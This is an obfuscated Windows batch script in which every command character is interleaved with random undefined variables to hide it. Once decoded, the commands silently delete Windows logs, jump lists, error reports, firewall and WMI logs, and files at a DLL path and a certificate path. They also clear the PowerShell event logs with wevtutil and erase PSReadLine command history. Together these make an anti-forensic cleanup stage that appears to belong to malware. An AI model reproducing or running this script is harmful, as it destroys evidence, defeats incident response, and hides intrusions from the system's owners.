d%TOb%e%SmIvaMYv%l%bFk% %B%/%HTaMAWkOao%s%zqcLRmyu% %eaNWRzv%/%jKSlhahZLp%f%bVRJVXYs% %KdYNXNuo%/%KketQ%q%iMcwg% %Gxadoiy%"%NROx%%LocalAppData%\%wyaryEha%M%YjfNc%i%qpU%c%PVwfB%r%euXXJKteIt%o%tniKtSw%s%BLqzC%o%JyCM%f%UqHyNyQFNb%t%PrAowpax%\%rAu%W%BDx%i%IEVtCkqJZs%n%wE%d%VrXECBcvm%o%onLrn%w%nT%s%jDoO%\%GYMxrfGn%I%QepHfl%N%RDMbylTXx%e%VWEYuvig%t%gfrLML%C%dCqG%a%wIXJLqmAx%c%TizG%h%g%e%DEPOv%\%QNqEMS%*%EhGojOrax%"%elfNkT% %na%>%xITKP%n%rLnwOF%u%EdvQEHFCs%l%XfjhhKsSG% %I%2%c%>%HyCtH%&%Q%1%iMJ%
d%XteCxSD%e%ehMhRxf%l%TB% %fJg%/%DNzNWwzU%s%d% %QezeIMWTu%/%pwgVEuy%f%Lrw% %lgDUyveDd%/%FqkYgxiH%q%txCrPlTWq% %NJWJYdewV%"%q%%WinDir%\%zHG%S%QMqknrKIb%o%XJOadlN%f%neVYfy%t%H%w%EGgwap%a%qciGdhDk%r%JpXjTxAn%e%ECnfIgDZQ%D%scrGa%i%OFVvb%s%pYrXzI%t%tMiWZYJ%r%Orf%i%IqqcJhAa%b%DncmDIJPQt%u%ofShi%t%YxiMXFK%i%HpoYqpXmY%o%PCTrsPI%n%Gb%\%zUZ%D%hNWCdYg%a%GkX%t%bIlWh%a%QMgMLA%s%X%t%bjthO%o%XtE%r%tUbAjudtYK%e%yhOtZQfcng%\%SstKmAz%L%RfW%o%mUwKh%g%xK%s%rfpOibFF%\%RFJTHQT%*%kuReTnx%"%PZEUqAUMsF% %PknJWI%>%NDBZUo%n%OXduDpbEj%u%lDECtyNK%l%DFAhioPN% %cB%2%vrIEri%>%ErUv%&%cT%1%rPhIba%
d%wa%e%qyBVwLWWR%l%SOWu% %zfwemxcl%/%kmaDH%s%ZIEXd% %h%/%SMxdN%f%hZOJxrYdzZ% %lLuzB%/%umcsi%q%TEnYI% %E%"%WGdX%%WinDir%\%cq%P%ufjOh%a%ZFx%n%hnTlgohq%t%EcB%h%WAAqaNbNsX%e%oYMbqy%r%Fz%\%XdbCdQBWnr%*%LtBljnRVIZ%"%nLUWPz% %WgsePNyGyx%>%FKYoRADjM%n%dfDfrpj%u%bcI%l%jqKGpomFT% %fsr%2%q%>%x%&%i%1%o%
d%kMEaV%e%sNDUJ%l%RIZBzwE% %BdyyEFEB%/%tR%s%jRRksCGCZ% %WtJl%/%W%f%O% %EmCfav%/%aOQtjTQ%q%FkD% %y%"%BbfsFpBpu%%WinDir%\%T%I%X%N%PhKJAHLHp%F%tcVqdeBMoL%\%QLTVHgrK%S%lljvRhel%e%IxdrZWNFFH%t%qsm%u%gVmqnA%p%HVYFhCjFd%a%dpCpY%p%e%i%SupsMVzxGJ%.%eSLivOuVv%l%FHBAlX%o%OIZ%g%Rkf%"%srbzK% %fmMEeLP%>%YRyRK%n%Msa%u%rTNdvEiJw%l%OeRWJkmm% %mneuBMaxC%2%QdYGqmP%>%sJZIsMKkAq%&%ahw%1%vr%
d%mfnQpkB%e%NhTJIeaB%l%NOwJcx% %yeJT%/%fCAMCd%s%Zrj% %CZYA%/%lJ%f%ANC% %xWtEwDJ%/%hhS%q%wdshaZQW% %eS%"%KELAD%%WinDir%\%jqYcVi%I%PT%N%MnYSvWYHV%F%qlVeU%\%B%S%Z%e%QDzBJSh%t%dcDkMPGnL%u%qr%p%ZPjpDMhhnN%a%KHsXimwxe%p%txxWZyQTV%i%uNvF%.%rRU%d%hVVFZZdEP%e%EVRxLmqbC%v%TnhIV%.%iFqY%l%VDCRZdBGo%o%NlRWMKj%g%itJyR%"%DGzjFxAYM% %QKwq%>%SqZoUAS%n%tXVEAvmEO%u%CLsNVRMvfl%l%GO% %oyjROou%2%JC%>%SY%&%LjhIXnR%1%mal%
d%mqEzF%e%A%l%qGcbEfG% %hs%/%tQEHvPU%s%xXjSi% %Debtep%/%RIwVM%f%gkEZPe% %We%/%otXQOhZ%q%mMcw% %Tu%"%Ymi%%LocalAppData%\%ZFWEe%M%NHZq%i%A%c%jfL%r%tGTdRPiLt%o%OCU%s%DeYtod%o%jiFeA%f%jcU%t%OQ%\%rEItiueROL%W%AeNIGwmZp%i%Eef%n%d%d%zhi%o%ELMQwp%w%zoEGfry%s%mAuQSstnhb%\%WRjOmf%W%gHHUGzU%E%rRgtYVtVq%R%XHUnGUiyOO%\%sPHmQm%*%glOgSCpmD%"%PNSHMZF% %hYGVy%>%MWPdH%n%lVtiAUtK%u%dsXDgrjldd%l%PdqZJtAGC% %AgTqKjPpE%2%uKxXPyoxW%>%iOPAvaSl%&%kWlzux%1%lHbgIJEJ%
d%lWpy%e%X%l%NibmddTr% %iJmJp%/%mQQtTbkbr%s%hhFqoM% %AUMYlMFmlJ%/%Nnyr%f%gFp% %IovpGPRvP%/%JGwNnWKi%q%ImErcD% %fjlenyffm%"%ivJaWM%%ProgramData%\%nZSMFbPw%M%oOPxwq%i%JxtwOgKUtL%c%VfEVMLbg%r%GjIJcUsuSn%o%PDXqtg%s%hFXyWGuxvl%o%yj%f%sxCTk%t%tnXrxs%\%O%W%uKGDzJi%i%HLdyPQWqE%n%TYwEtZ%d%nunPUDjMm%o%FLPnOpvMRO%w%yOc%s%nSYEpLmz%\%yfRRJcZLF%W%fLSsVkm%E%etr%R%tVsKIFBw%\%UbqSsh%*%RumXOun%"%kAUJavjPK% %LlGnwe%>%JOihfNm%n%eNmtZU%u%FKQFTPbp%l%HgxMCHUX% %cqPegzgbM%2%Kc%>%Fo%&%DuZUJfJi%1%AGR%
d%FBJ%e%MHyS%l%dxXgGz% %JJZSpAJn%/%RisFEzap%s%hgbKnmCsfn% %LXxH%/%qmOOTDF%f%h% %O%/%kRSqpVNZB%q%JmBTxwgXJL% %v%"%QY%%AppData%\%yucpVzJEB%M%eWv%i%fk%c%mqumYQPCFE%r%kiPAPD%o%AJ%s%OKWp%o%VptK%f%uc%t%b%\%qZTJOQ%W%dDAbrz%i%v%n%slHN%d%dErRnL%o%jqTQa%w%cFBQCpNgWM%s%dg%\%GQt%R%UlyyGw%e%Apk%c%cYVwa%e%fPcGwEsNg%n%FT%t%oVkBGDQ%\%tJvIUaYDg%*%RpboRxOPkr%"%nmPjzEA% %CqPJmCZRM%>%qf%n%kZ%u%ftqQmdmT%l%JMaPzXiJf% %iLvSzzZufj%2%USP%>%UXYAt%&%BFOOAuY%1%FdukWHzN%
d%UGxx%e%b%l%HVukS% %F%/%AGullDy%s%NJPQJBP% %vTURX%/%ULN%f%my% %TOyNLrq%/%FXonQR%q%ssIVPbWW% %uErYRXSM%"%xKTaIF%%AppData%\%v%R%fYeO%o%mLDESaoTaa%a%FEmieY%m%yANot%i%tHrGiUtvDy%n%Wuq%g%DWkOtx%\%S%M%NWtzrMJ%i%CiJacYsqrX%c%AgNyRwVmcs%r%nYDWOE%o%d%s%BBtW%o%rGenqX%f%MpBhby%t%B%\%kqe%W%Sx%i%GJjrrSib%n%cI%d%Pp%o%PqdIxOQP%w%CFFU%s%DO%\%oZb%R%CybujA%e%TzAMytfc%c%RcXWUAX%e%yAwDH%n%NXuDDv%t%i%\%WzIGY%*%usUHqQqgU%"%AnUeZXIJR% %DUTkxUaIIg%>%RL%n%Bju%u%WIqFxozss%l%z% %MBQ%2%ic%>%gnTQxGKH%&%d%1%sQ%
d%JHiapJx%e%umTlRNTa%l%ZeJMhPV% %FuKieTV%/%fQ%s%GvcGwD% %wBV%/%kXHbLZrcCM%f%oW% %eSH%/%sZUBhLBYc%q%xHha% %MmijVHJ%"%Hgh%%AppData%\%XutYm%M%pGaUaxuK%i%l%c%aHKZR%r%LGd%o%bweDsV%s%OravFrrHM%o%sglhZwZhQg%f%pvOezD%t%DSzSV%\%MPLbqS%W%NRisKI%i%WBWbySaMk%n%duuYVT%d%DAwE%o%wYzNeQzziP%w%jCIX%s%dPvAD%\%lFaw%R%TB%e%wRJqAmR%c%k%e%HTgxIQ%n%FA%t%QQFFTwrq%\%yYR%A%lQFpJmq%u%brjY%t%m%o%g%m%ZUsKq%a%wGVM%t%DFqWhhs%i%JntMmoI%c%fEPmk%D%RLtekAfQIp%e%WVoQ%s%DngmH%t%vzhQdUwB%i%nVC%n%MaxPqNVDm%a%OlAPP%t%htGRu%i%xB%o%f%n%WLSjfBXx%s%LgYGWMRa%\%cyYCHdRwMY%*%GtACSzOZW%"%UnPKvinf% %l%>%ae%n%GLBZelFF%u%rjUkOd%l%qsrDnxRbcP% %c%2%bGuhM%>%AlNMS%&%Lz%1%GUNF%
d%BaKNlFoWM%e%ajLo%l%SgZOKn% %Kro%/%LPGTKupbGq%s%BioGQ% %xTfOj%/%HCJgNu%f%vFEnVE% %ymbhsg%/%sFPZfRmFzq%q%RxiU% %heAt%"%gFjxun%%AppData%\%gjooCX%M%uzF%i%u%c%VirFoh%r%gBGaSCrv%o%p%s%YrrKusJ%o%neDhBwvw%f%U%t%Dcytblcbqp%\%lfD%W%UvQWeaC%i%bBh%n%GYL%d%xmzMdgbGoD%o%gVrk%w%mP%s%DcLPYTg%\%NJ%R%RXwSpMZMZc%e%sAsRryXR%c%vj%e%VokqRINjGS%n%VmyAuZU%t%lEh%\%r%C%cgKVUo%u%nLbRDWsd%s%ewziioX%t%hMR%o%Yje%m%LknVUNGG%D%yEmrvRsMvT%e%SoWLV%s%YzVYe%t%QtulG%i%VMwT%n%EtQMIJn%a%xVbNxEf%t%rAnYynjZGN%i%s%o%XnvoSYLx%n%XAjcFm%s%B%\%gUzxhB%*%WbCfypoaUE%"%xsLguMWo% %pGyyA%>%POVqn%n%DBiFdRN%u%MlxbOBykeR%l%zaMIe% %PXjZu%2%hjd%>%fC%&%kAQXuBNLh%1%QLl%
d%Zv%e%pFvSpkTUnD%l%o% %qawfkz%/%RdBnZZPqiJ%s%O% %mFxltOUwTc%/%WRKLUob%f%VJPkYtAmu% %N%/%iTk%q%Jc% %yEupx%"%AbbJbZ%%WinDir%\%eq%S%J%y%Z%s%zhB%t%yAeS%e%HREvq%m%uHa%3%zMg%2%vvtZ%\%PVsdGW%L%oEirCnK%o%mxssDBXCCs%g%RObaYoLnm%F%ORiiUXR%i%zzQwH%l%PeyUlc%e%LTTOOkrz%s%JHUM%\%eqareiWydV%F%RTnexpmh%i%o%r%XmdVpjh%e%hHOSCUeD%w%W%a%yUqOZUA%l%q%l%MTJxrzLbh%\%qdHcNVKIFv%*%tPtZuRPbq%"%NcARqQ% %xABVm%>%mfpJB%n%SfMOjVVoSP%u%DQCCVvj%l%OIVu% %IFNGx%2%vHS%>%sqRIrS%&%IIaYRbGCgA%1%aUrpBRtYOD%
d%XK%e%VfhoBNq%l%rFS% %MgGpixF%/%OfmXPfCdp%s%mH% %sLW%/%dhu%f%rcxuuFLbf% %yXUttVz%/%e%q%sGGmgZJ% %L%"%FuKEJ%%WinDir%\%gPsC%S%eIFriotCoQ%y%NiYFL%s%tYpB%t%ME%e%FOqAdn%m%WhXzRsM%3%FjZAWEqhok%2%xA%\%lxmGtwkGQu%L%E%o%KIDGt%g%CuDvCXer%F%skmw%i%IZP%l%pmtFw%e%TNWCyM%s%rirtMd%\%neRdWTX%W%gilsYm%M%FBbd%I%ryODLvNSk%\%mOj%*%FsTxnHMdpM%"%M% %d%>%MOGwSDBYO%n%YHuJgT%u%zGbsh%l%DjPn% %oyWCH%2%P%>%IV%&%JZDUXXqTRM%1%mjmd%
d%OyoKTFtR%e%GKitZX%l%BVb% %fviFXpjcG%/%teasDOWBDR%s%xuEFmsuFgb% %EnZni%/%DVjaEa%f%HHZRaJF% %V%/%K%q%bVbLN% %o%"%zMmgkCAN%%WinDir%\%c%S%mRDoSHQE%y%ScvphfQI%s%o%t%JfqU%e%rGlI%m%pT%3%Jwyzspata%2%uYaxU%\%iE%L%yd%o%fnzCdxwY%g%jIVF%F%VpQZi%i%oAwCqtYp%l%wbfzyy%e%KQcLp%s%O%\%JQUcmC%*%sLicoaNfb%"%PmDRsBx% %uU%>%o%n%mvvS%u%bvo%l%qGHvrKEJo% %umlYTWV%2%MRgxAdiZoj%>%iZQcgNq%&%rVYuf%1%r%
d%bCPKXIl%e%IXY%l%rl% %PTwlEyDXlW%/%R%s%KpvoZAoT% %hmapjLew%/%nlqixkB%f%uQN% %SZ%/%hYf%q%YzJx% %viVTEM%"%Sn%%dll_path%"%fNAdcD% %XbasZmr%>%AXZCa%n%Y%u%sERH%l%wXBZoTrX% %p%2%HpgaE%>%zwB%&%MIpf%1%jH%
d%gPAqfj%e%b%l%nLfpfzlgG% %CNW%/%zbl%s%eLPsLjLIJd% %bckn%/%rv%f%C% %OkIDfo%/%LazVDBs%q%cn% %nHO%"%nrin%%cert_path%"%dz% %L%>%S%n%TUdf%u%zJNqJ%l%nDxlzEQQV% %xKBB%2%kHRnGKInK%>%vtjdeOQm%&%HTWpJICQTd%1%xjIngfVYTv%

:: ================================
:%EJAfJ%:%jibOgxgcdq% %TdQhPpsqJB%=%HVehGCIM%=%qurwjTH%=%yPTSvZl%=%SBEedL%=%eWrAUAyfc%=%IcfuF%=%E%=%BuZubF%=%PePqbeU%=%MtwkpVBplt%=%YQ%=%mncUqaYQxf%=%I%=%LyTufu%=%pAAKaDxy%=%C%=%Rj%=%EdFDEjEG%=%ktSYkfoHH%=%UmUzg%=%BlsGpxwuJW%=%ngMaw%=%amDUXAU%=%oTz%=%p%=%aCRg%=%nkoSggR%=%LUzPL%=%ZCMATYEklU%=%Hhth%=%trKZPj%=%QHkfoYdle%
:: Remove PowerShell Logs + History
:%vxSX%:%cLbshihE% %ZPtSlc%R%WozOTZ%e%lbhVEPm%m%rZJRbPUJc%o%fOkEMLrJtn%v%H%e%eGhhrw% %tF%P%xujHs%o%kh%w%YChOLE%e%hoNALgB%r%JdhSxHp%S%J%h%nEuHyVPkEI%e%gmEgf%l%TiUBn%l%xNZxMwdbP% %BigNR%L%UQhRncb%o%ARWaD%g%bXCpXjqM%s%i% %y%+%vvrvY% %mWE%H%aPYtYWV%i%PmQAMI%s%iPqVhqo%t%El%o%kENODK%r%rLCu%y%aPsKCgc%
:: ================================
:%BcphqOd%:%aukSUikc% %CxOEvaR%=%knhQxc%=%h%=%MewVjLEagy%=%ewX%=%MNjmHm%=%pSKwyPJPX%=%a%=%THohL%=%lsCx%=%gXxuODjC%=%uxxsANA%=%qsZN%=%zJMzuJcywG%=%vKhNls%=%fP%=%uJ%=%Rw%=%rjamrSQc%=%cKyMIsz%=%WCXjdmlk%=%ynNXxodaQ%=%OkZp%=%kRYoTqzV%=%zCHKwsvBr%=%vNrt%=%X%=%LntA%=%JDzZgd%=%cdnTgPkLF%=%WxTJUzdqAP%=%njfZG%=%k%
e%qotGs%c%EKtjN%h%gAuGkaCxF%o%fygf% %DurcIuM%R%YNzpnHTGc%e%O%m%ljGWPpmmFz%o%eIrlS%v%nAgj%i%tTBxMfGxNv%n%kUzZIMpU%g%aI% %Ua%P%oikPzKS%o%GIrLLZEQVR%w%AWtCZa%e%wQOR%r%LrC%S%pZlyRk%h%EIuzsY%e%JErzDyT%l%PBL%l%XMGsiRs% %BbJ%L%kfOWiBc%o%V%g%J%s%P%.%VUih%.%tbCVJ%.%wNU%

:: PowerShell Event Logs Clear
:%C%:%CiptbSL% %SXOUt%P%jrZVP%o%ceGF%w%nqAGotfg%e%n%r%HCcbpSeeX%S%MAUAs%h%wyiWTbWoO%e%IRtSeNMLXv%l%T%l%frSTsimpr% %Ap%E%fHebY%v%RMO%e%WQwl%n%l%t%M% %VjamxPRRv%L%FSU%o%AScx%g%ZLtXa%s%YQrnnClP% %ZAuPhkzo%C%ORKTDwbGJ%l%LuJghxXspX%e%zIpJvsM%a%CD%r%MHEzLIVik%
p%EjUF%o%o%w%RwEnCRq%e%eSSiMSmXH%r%eihaE%s%S%h%iiNJTpgBj%e%ZCMYWuPwWi%l%Cg%l%gf% %bpLPTlzhJ%-%TiNEIx%C%L%o%GbHhbbC%m%NYKygkYNFB%m%m%a%ujbBgQQav%n%Y%d%B% %uCCtHYHRU%"%Tsltx%w%TBQxphGpCx%e%Z%v%rOSA%t%gltyghFSDn%u%YXgyzaXuw%t%l%i%QtHQfmpIxY%l%aC% %Y%c%yc%l%YvoCNV% %JaHGLcnsXB%'%E%W%zpvmWg%i%RRcik%n%Rze%d%rPmIDTyda%o%EhvZouqFo%w%IAtrnsu%s%HkjAqZ% %RoBMebMsW%P%eMUeLWrzl%o%kM%w%xD%e%P%r%Ukamc%S%AyzXdj%h%kdOeL%e%JeslT%l%hh%l%bnCPCib%'%gfAB%"%hvS% %MszXhuFzhY%>%YGfv%n%cswgZULxK%u%k%l%LyTOJcNLu% %yWmJPikSXE%2%PHoRLnqBni%>%Lhkrewvmt%&%SbAh%1%zFBzXO%
p%kjfIsF%o%PsnDiRq%w%zXDIiyr%e%MQPrvsMF%r%IZrBgcJPC%s%Ayyu%h%IwPmCVfX%e%rfsjz%l%NNHmXY%l%cgQ% %MibVoBgjOq%-%KM%C%nBqhWcO%o%DoLyjO%m%yG%m%PSsEBed%a%BY%n%AYAUkuzRd%d%NRnHEoCF% %hQGikQwbc%"%MojtglCRMw%w%GsjoCM%e%Jvuut%v%fOniRLe%t%yBqZeKg%u%xMGoh%t%NdEAjl%i%u%l%Yqjltmg% %nHDSAgiuAh%c%mrRiQgg%l%zPAaBJXsN% %QpTCBVOs%'%MidpBpn%M%ynW%i%hd%c%leqX%r%nA%o%umIkeUfQhr%s%gYzDCVs%o%cEBOD%f%E%t%NNZXpEj%-%usIVF%W%ZfgPJnX%i%Umw%n%PBXfRzWzG%d%fqrFYOw%o%wB%w%dlT%s%Y%-%clZ%P%J%o%BNK%w%yODVGxVVo%e%iQaN%r%gYAdYY%S%PBTAki%h%huMja%e%l%l%sVPHBb%l%jJ%/%Zphu%O%fxJBZmg%p%WxUoncKQ%e%AVCkMIcxi%r%jyxyN%a%pPULWNdKc%t%EduXPMsnKx%i%cKtPXtz%o%mxGrdv%n%wdiVY%a%GkWOS%l%PSUte%'%rv%"%QDqsEUwdMH% %SpDKgyHu%>%OQBgqJOKGt%n%ZEreJES%u%KNkmGrKIb%l%ofNtdUMLv% %TCTaYALKZ%2%xVnV%>%AzYJXAGbK%&%MuF%1%JFdiBCNkTK%
p%i%o%YB%w%V%e%hJ%r%vNdAiFoECw%s%trRsGxAt%h%YXxnLbBw%e%occOB%l%qXrH%l%PezHQUvl% %OipSPc%-%ivNdIzjJd%C%cUkl%o%iHH%m%Mq%m%wzZ%a%F%n%tZjF%d%AClQ% %H%"%wilmBWJG%w%ucq%e%gktmBv%v%udrfDHq%t%gGkt%u%pIBYcb%t%ImHjUIS%i%MvcR%l%hoaEmE% %GEhQacsuLq%c%VYi%l%WeZOHBvHaP% %cUfklChwje%'%EEZdUapFs%M%mvuzWBXnm%i%o%c%WQXUrRv%r%u%o%kQUttJkn%s%QPDjELWltL%o%EWqggp%f%aT%t%KseQd%-%lwfu%W%kruclCQBPh%i%XAcmCnQeWK%n%BVXgVcZfb%d%jBsWhdPMkl%o%gJCsYwkJ%w%GEeJGt%s%alpMKtjc%-%KV%P%hTXj%o%hZcKAUhmN%w%ZJXARYzKFf%e%LCAk%r%zLmd%S%mzKBqzZZEg%h%MWOqd%e%OrKGa%l%v%l%NdvXv%-%TibzRGeB%D%wxzIr%e%mgurCs%s%uGmwhoT%i%IQAVrkD%r%y%e%j%d%jXz%S%N%t%vJiazB%a%lO%t%Fmh%e%xB%C%exNbuCA%o%fwst%n%V%f%xnUbrr%i%khjtr%g%zIbM%u%uWdCMFWTmN%r%WmE%a%esYMKwHMN%t%qfTuNiM%i%v%o%sofYx%n%cubOZ%/%kCRIdsAPi%O%EmjR%p%iRTPwfovU%e%DiWhC%r%WzIn%a%vyyfJYTwsV%t%NHuyJk%i%tnWcsjNh%o%xoqEBPW%n%q%a%aDKVf%l%TnLzhjWD%'%hY%"%nFf% %lKhXxXYPZt%>%jBnxT%n%ZSNS%u%oGzgnSrVv%l%tapuge% %fYOMdvUIEp%2%aSoI%>%pWQnwRr%&%ftyJovFply%1%JR%

:: PowerShell History Clear
:%HLGo%:%dIBLp% %px%P%emqFf%o%nuQbuwVJ%w%RuFJ%e%pEMVkvUPF%r%bTSktMrm%S%bILHVFZoZo%h%ANQtz%e%UWAQ%l%PbjB%l%seYDgWop% %ZPeBp%H%AIUsqME%i%WcGUiN%s%LJQpdI%t%qvBZAuxBCR%o%zlZUh%r%UKdpLrZ%y%KtOdmGPBe% %VxT%C%fvpF%l%CAH%e%hIXZSTbPtH%a%EI%r%BWO%
d%VuragwMWG%e%g%l%gCRoFESc% %CIOqxCHt%/%eJfGM%s%zoDsa% %kEtRmnUOz%/%UwXmRnz%f%XVOv% %Sh%/%Jzfea%q%FdVbmWmNB% %oFES%"%jQiFA%%UserProfile%\%p%A%clWNv%p%V%p%EspEwO%D%NkE%a%Rl%t%eogNJ%a%c%\%LQ%R%vXmQ%o%lSRygJ%a%ZVXXh%m%ujtvsnWpP%i%fRd%n%q%g%cADZsn%\%hM%M%CzdtgrLRLF%i%jPD%c%WCfOWBOyy%r%lTfZOMy%o%QifCczX%s%LVtTNG%o%q%f%JAOcCll%t%zk%\%Xig%W%ELqxW%i%E%n%YuHPUZv%d%WPxZOCbj%o%fxmRbsU%w%mlzShoc%s%w%\%R%P%ulKt%o%VrdhXrBYN%w%Cisrv%e%OzzbcY%r%GIlT%S%UpojD%h%SwPQrvdwjs%e%eDBjewLAb%l%sQpk%l%KKfU%\%lVGqVhosG%P%TEkTh%S%EOKfpVhb%R%WhNyh%e%o%a%MS%d%Z%l%mNyttJeFYL%i%uk%n%zXPWfosddn%e%TG%\%e%C%EL%o%rUcZ%n%oWpflrF%s%kfLCPyEq%o%sNBL%l%JUSFp%e%eFuFs%H%VTAar%o%rpFI%s%mmXZvqM%t%YV%_%qSjUjodsTo%h%qvpWINvjb%i%kDtIoDd%s%Smrx%t%WagVeeTbgT%o%XRhCMsOXj%r%et%y%kGfFoEhLme%.%CGKPdq%t%sGFRwLz%x%ppTTJWZKP%t%l%"%c% %M%>%KsLw%n%T%u%rdccDQh%l%jnMbzc% %IjH%2%GBk%>%ESEkWp%&%T%1%O%
d%wUTxp%e%nDzHNdP%l%lKEhjFmjl% %rHPGBC%/%Z%s%CjhjUmjs% %mfYGc%/%Pzj%f%JAGUBS% %YzKSKgCcfN%/%QwZRksapC%q%yagTIwveeF% %hRPT%"%mlwkCF%%UserProfile%\%flyGADjC%A%KhXqApDJE%p%Flaw%p%WRqeHf%D%FjMXkhN%a%lFfOZlYq%t%IbIi%a%dKaqSYRuq%\%NDcA%R%vaZJQzCq%o%gcg%a%pltGHCWaRQ%m%BHqwx%i%hYD%n%UKPzwWU%g%vBFZomn%\%pEVbaL%M%H%i%GVKwtx%c%Ekvvup%r%EdDeqmNG%o%EzfSO%s%GpNZLSM%o%FvwZaDZL%f%SWcr%t%uGpVUjTm%\%VGRdFwm%W%hHqym%i%O%n%hEoVBqdAz%d%Gac%o%ydhIoep%w%HRPuwrXRW%s%sIq%\%FoiFEivslG%P%sbSNdoZZ%o%jDyR%w%FAUQ%e%qoF%r%yEEKvSq%S%VGD%h%Z%e%DZsriSM%l%hWAFY%l%QCbZKSd%\%GemzXz%P%SjriT%S%qtkL%R%oLGyz%e%oUFEUgEJUr%a%UUAy%d%H%l%X%i%QclN%n%iMmD%e%G%\%HnZ%*%ywFli%"%Tq% %QwmYrFW%>%EkdUu%n%dDMaDmXzO%u%OwpKD%l%pwybWrQZb% %wEOUGYDK%2%jnDdCONci%>%zboLqbbw%&%LphWr%1%AIFxIFqLi%

:: PowerShell Local Logs
:%Q%:%YM% %nG%P%qe%o%h%w%P%e%trTP%r%LPewmnwiV%S%NrGziZFSMc%h%fqQgrbT%e%qPQP%l%sey%l%kqmMFypcsm% %UudzoLA%L%Uakly%o%LtCYsvmQg%c%EGWjwwSCAS%a%XpA%l%UkJIRPf% %gE%L%jak%o%AkZKHxNJ%g%ZzDdRfXIO%s%ZfrVGBQUb%
d%eIsiPllF%e%Vwidv%l%mkkTFm% %OgvTZZHaK%/%IVX%s%cZqWGF% %ASIPzSbo%/%NJI%f%LDwztOmKWE% %AAUgPRFETq%/%nNG%q%YrDkbqb% %tzoKQ%"%MEr%%LocalAppData%\%zgSJAVv%M%RyJakb%i%PRc%c%L%r%OLcnzbm%o%VKMYOrDVF%s%SWtXKtl%o%f%f%YrDl%t%zfFLAsdIcY%\%i%W%tMcxUvfKta%i%OENqSjEQ%n%IoRfYqWZ%d%MIQDHBackE%o%ETACRgwE%w%Twh%s%Wyv%\%KnqaPqkmP%P%dLrucToo%o%MKmaOEu%w%JCpeMm%e%nNpH%r%IHV%S%FjuUSmo%h%GWHxPd%e%yOxaQunVNc%l%HZPkioJ%l%masbAsLhI%\%zLOLCLjl%*%E%"%DDBB% %MCq%>%eaguwfSMgo%n%YxIi%u%xg%l%FBwAxAkgjr% %ka%2%nHIjh%>%jWUgCoTADV%&%QJXTc%1%Ofapdxq%

:: PowerShell ProgramData Logs
:%b%:%LfFDpQQvxw% %JuIYkhN%P%DFGIkFZ%o%zcShggYho%w%h%e%i%r%RlWsIBe%S%bLXD%h%lQgE%e%ifQGom%l%KNLElHpv%l%hNmr% %BqnaBpu%P%TgcMMTqKn%r%GQtWQCUIuH%o%vIsYW%g%ieSqUe%r%unTKbtUMj%a%caupyUKHYI%m%vlkoWQz%D%xJO%a%IKDwO%t%Sfxuc%a%QpQslNRtrd% %FgtexTFLVy%L%aiecucI%o%YWxyNG%g%nllpQG%s%IasNrUkvtn%
d%yh%e%YcyDHwzp%l%ljEMHgtl% %uu%/%y%s%AUOpj% %sYhLtjufu%/%WQRhVQkSNh%f%fWSJeoMp% %gDuKHuk%/%uDks%q%GR% %V%"%SP%%ProgramData%\%ayvP%M%CBW%i%EqAho%c%lhzPbIhAe%r%zGFnKCk%o%gfIFrsn%s%Ca%o%ANUQmI%f%TgcKGfmn%t%IdxrVjwvmK%\%bdEWgrpu%W%vevXQjyP%i%GXWkyT%n%snq%d%qEELzumj%o%MpYJe%w%o%s%aQedVMMhT%\%maBEJ%P%mfksgy%o%RyY%w%ggDaB%e%Ue%r%e%S%iR%h%DlN%e%koi%l%snxWfK%l%ccjiMIAM%\%OirUViREe%*%BTEGpHZoY%"%dgaUv% %pruc%>%He%n%Ls%u%lurNyO%l%u% %R%2%a%>%OMmUyUlbd%&%HjzyaH%1%WtidoDOR%

:: Roaming PowerShell Cache
:%vSvGlS%:%VUEeZLz% %LAcTDNQZzy%R%uzrHd%o%fyRQ%a%SRHe%m%wZzqutSR%i%Mu%n%sPtcDw%g%cipWha% %WxNvBMNcaU%P%lP%o%aeCUeP%w%n%e%ErQE%r%DOhlk%S%iwoUbNplK%h%H%e%nl%l%YZQ%l%ALZqtEZ% %MiZGSC%C%vAsLSt%a%OSxsLqa%c%iK%h%rZ%e%smK%
d%lvPVbCnjDP%e%ZqqcEXr%l%wHR% %QaoPkvuvgS%/%UzkOQTI%s%uo% %ObJimbmlui%/%qfQ%f%wHxhC% %zaEbnqQzVM%/%oIcNQ%q%SjfxvcrEB% %VO%"%FZiRwno%%AppData%\%oUwfhoN%M%DK%i%vVESKbK%c%zFDLTifJ%r%w%o%NAPplwD%s%AR%o%HskT%f%zYDlzHfLyw%t%GInmBgF%\%qCAuM%W%grAthn%i%c%n%YkdIsLcgEk%d%GYuOYFZInD%o%gaP%w%aZwltBouvq%s%gSa%\%rfTvd%P%ViXa%o%JjsHTdCeQc%w%aBUVGWbuqA%e%frGbvi%r%BxoxEnLSb%S%MkNaRLMxCN%h%j%e%Wlvsg%l%XSNaZPQqht%l%L%\%bQaqRF%*%feBSlyDxv%"%GvTIDg% %oUvkVIq%>%Aq%n%Sb%u%ZUuPY%l%urui% %fMzSzCFq%2%M%>%nPrSqP%&%Wu%1%KVf%

e%SjkCgQ%c%jrUFp%h%FTO%o%d% %mcVGV%P%UjIEDPN%o%wh%w%ekobVDLG%e%YEoowttQra%r%lrSERlVhs%S%mozwSxdgL%h%nZLTXu%e%SJDeanlTov%l%jcq%l%YZQazwijy% %ZfpR%L%OA%o%pTiZRnsY%g%iDFPuIBKQ%s%zNWZPskGo% %zrfwGV%R%IuTakIYk%e%IyxQtGzv%m%QGHZE%o%iJGOaS%v%hWq%e%YOMzJGQMWS%d%hW% %Cgczxid%S%gKQRF%u%EIvGDgCiEn%c%LESI%c%kLQNej%e%nWiCRupB%s%Kxa%s%Gewmk%f%V%u%kTXZu%l%wDFFUDxX%l%UCwqcqwpA%y%AYi%!%WeIaLNa%

:: ================================
:%yJE%:%ydRXVUm% %tU%=%LAryY%=%R%=%cbblZvgn%=%bLE%=%qW%=%Cghs%=%pKIS%=%MOEj%=%cNjGtpsu%=%Qctv%=%zJYjL%=%uBftqZPD%=%rW%=%Zq%=%YvC%=%mymAbhNkz%=%aRLfTcRb%=%iAelTR%=%CQAco%=%bgdh%=%aA%=%YZND%=%dLG%=%CooNdRexK%=%LNHAbhuru%=%eWjlWdhyWM%=%Auc%=%mTLpW%=%E%=%WHOSjLNh%=%MIGaVfOMaX%=%euPca%
:: Remove temp.cmd from C drive (robust logic)
